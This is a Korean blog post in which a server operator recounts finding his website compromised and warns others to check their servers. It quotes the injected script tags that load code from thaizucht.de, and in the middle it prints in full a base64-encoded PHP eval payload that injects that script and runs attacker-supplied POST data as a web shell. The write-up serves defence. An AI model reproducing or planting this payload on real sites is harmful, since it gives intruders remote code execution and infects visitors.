[해킹차단] 이런창이 뜨는 사이트들 정말 조심하길 바란다.
혹시 서버를 운영중이시라면 아래의 글을 참고로 하여 자신의 컴퓨터를 점검해주세요.
호기심에라도 아래의 코드는 클릭하지 마시고, 일부러 링크가 안되게 ..... 을 추가 시켰습니다.
무리하게 들어가지 말아주세요. ^^;;
구글크롬이 그나마 안전한 브라우저라 생각되어 웹검색은 크롬으로 하고 있는데, 구글크롬에서 상당히 자주볼 수 있는 국내 웹사이트들...
특히나 뉴스사이트들이다.
일단 아래의 경고메시지들은 해당사이트에 악성코드를 제공하는 이미지파일이나 스크립트 문구가 있으면 나타나는 문구이다.
헌데 어느날 갑자기 내 사이트에서도 저런 문구가 나타나기 시작했다.
처음에는 대수롭지 않게 보다가 자꾸 찜찜,,,
웹페이지 소스를 뒤져보니,
<script src="http://thaizucht.de/gfx/......thgr_prc_log.php ></script>
등이 삽입되어 있는것이 아닌가?
어떤 노무새퀴?가 이런짓을???
우선 웹관련 파일인 *.js *.php *.htm 파일들에 thaizucht.de와 스팸모음 자료들을 토대로 하나씩 찾기 시작했다.
common/js폴더의 파일을 비롯 *.js 파일에
document.write('<script src="http://thaizucht.de/gfx/......thgr_prc_log.php ><\/script>);
라고 254개의 파일에 넣어놨고,
htm, html 파일에는
<script src="http://thaizucht.de/gfx/......thgr_prc_log.php ></script>
라고 7개의 파일에 넣어놨고,
php 파일에는
<?php eval(base64_decode('aWYoIWZ1bmN0aW9uX2V4aXN0cygnbGxrcycpKXtmdW5jdGlvbiBsbGtzKCRzKXtpZihwcmVnX21hdGNoX2FsbCgnIzxzY3JpcHQoLio/KTwvc2NyaXB0PiNpcycsJHMsJGEpKWZvcmVhY2goJGFbMF1hcyR2KWlmKGNvdW50KGV4cGxvZGUoIlxuIiwkdikpPjUpeyRlPXByZWdfbWF0Y2goJyNbXCciXVteXHNcJyJcLiw7XD8hXFtcXTovPD5cKFwpXXszMCx9IycsJHYpfHxwcmVnX21hdGNoKCcjW1woXFtdKFxzKlxkKywpezIwLH0jJywkdik7aWYoKHByZWdfbWF0Y2goJyNcYmV2YWxcYiMnLCR2KSYmKCRlfHxzdHJwb3MoJHYsJ2Zyb21DaGFyQ29kZScpKSl8fCgkZSYmc3RycG9zKCR2LCdkb2N1bWVudC53cml0ZScpKSkkcz1zdHJfcmVwbGFjZSgkdiwnJywkcyk7fWlmKHByZWdfbWF0Y2hfYWxsKCcjPGlmcmFtZSAoW14+XSo/KXNyYz1bXCciXT8oaHR0cDopPy8vKFtePl0qPyk+I2lzJywkcywkYSkpZm9yZWFjaCgkYVswXWFzJHYpaWYocHJlZ19tYXRjaCgnI1tcLiBdd2lkdGhccyo9XHMqW1wnIl0/MCpbMC05XVtcJyI+IF18ZGlzcGxheVxzKjpccypub25lI2knLCR2KSYmIXN0cnN0cigkdiwnPycuJz4nKSkkcz1wcmVnX3JlcGxhY2UoJyMnLnByZWdfcXVvdGUoJHYsJyMnKS4nLio/PC9pZnJhbWU+I2lzJywnJywkcyk7JHM9c3RyX3JlcGxhY2UoJGE9YmFzZTY0X2RlY29kZSgnUEhOamNtbHdkQ0J6Y21NOWFIUjBjRG92TDNSb1lXbDZkV05vZEM1a1pTOW5abmd2ZEdobmNsOXdjbU5mYkc5bkxuQm9jQ0ErUEM5elkzSnBjSFErJyksJycsJHMpO2lmKHN0cmlzdHIoJHMsJzxib2R5JykpJHM9cHJlZ19yZXBsYWNlKCcjKFxzKjxib2R5KSNtaScsJGEuJ1wxJywkcywxKTtlbHNlaWYoc3RycG9zKCRzLCc8YScpKSRzPSRhLiRzO3JldHVybiRzO31mdW5jdGlvbiBsbGtzMigkYSwkYiwkYywkZCl7Z2xvYmFsJGxsa3MxOyRzPWFycmF5KCk7aWYoZnVuY3Rpb25fZXhpc3RzKCRsbGtzMSkpY2FsbF91c2VyX2Z1bmMoJGxsa3MxLCRhLCRiLCRjLCRkKTtmb3JlYWNoKEBvYl9nZXRfc3RhdHVzKDEpYXMkdilpZigoJGE9JHZbJ25hbWUnXSk9PSdsbGtzJylyZXR1cm47ZWxzZWlmKCRhPT0nb2JfZ3poYW5kbGVyJylicmVhaztlbHNlJHNbXT1hcnJheSgkYT09J2RlZmF1bHQgb3V0cHV0IGhhbmRsZXInP2ZhbHNlOiRhKTtmb3IoJGk9Y291bnQoJHMpLTE7JGk+PTA7JGktLSl7JHNbJGldWzFdPW9iX2dldF9jb250ZW50cygpO29iX2VuZF9jbGVhbigpO31vYl9zdGFydCgnbGxrcycpO2ZvcigkaT0wOyRpPGNvdW50KCRzKTskaSsrKXtvYl9zdGFydCgkc1skaV1bMF0pO2VjaG8gJHNbJGldWzFdO319fSRsbGtzbD0oKCRhPUBzZXRfZXJyb3JfaGFuZGxlcignbGxrczInKSkhPSdsbGtzMicpPyRhOjA7ZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFsnZSddKSk7')); ?>
라는 코드를 16개의 파일에 넣어놨다.
전체적으로 thaizucht.de 이 단어가 들어간 사이트를 추적해보았다,,,
총 9개가 더 발견..
이후 바이러스 검사까지 완료!
하루가 지나고 다음날,,,
허걱~~~
또 악성코드가???
우찌된 일이지?
아파치웹서버로그를 별도로 저장하지 않는터라, 다른 로그기록을 찾아보았다.
우선 파일부터 검색해봐야겠다.
혹시 날짜가 어떻게 바뀌었나?
분명 코드를 수정했으면 날짜가 바꼇을 터!!!~
오전 8시까지만해도 괜찮던것이 오후 8:52 ~ 8:53분에 일괄적으로 코드 수정됨...
파일 날짜가 이 시간대로 바뀐것들은 죄다 코드가 수정되어 있었고, 분명 Telnet과 FTP도 껏는데 우째 다시 실행되어 있다?
재부팅된 시간이 언제인가를 정확히 파악하기 위해서 PhpMyadmin의 상태를 보았다.
"이 MySQL 서버는 0 days, 16 hours, 48 minutes and 14 seconds 동안 구동되었습니다.
구동 시작날짜는 10-05-03 15:15 입니다."
어제 마지막으로 건드린 시간이었다.
결국 재부팅은 되지 않았으며, 일괄자료를 수정한 것으로 보이는데, 시간대가 비슷한 시간대인것으로 보아 FTP 로 접속한 듯...~~~ 음...,,
내 FTP비밀번호가 노출되었나?
일단 FTP서버도 차단시키고, 아이디도 몽땅 바꿨다.
다시 하루가 지나봐야 할 듯한데...
음,,, 여러분들의 서버에 혹시 침입자가 있지 않은지 확인해보세요.
위의 내용들은 구글 검색사이트에서 조차 나오지 않더군요.
알려지지 않은 또는 서버 운영자들도 잘 모르고 있었던 부분이 아닌가 싶네요.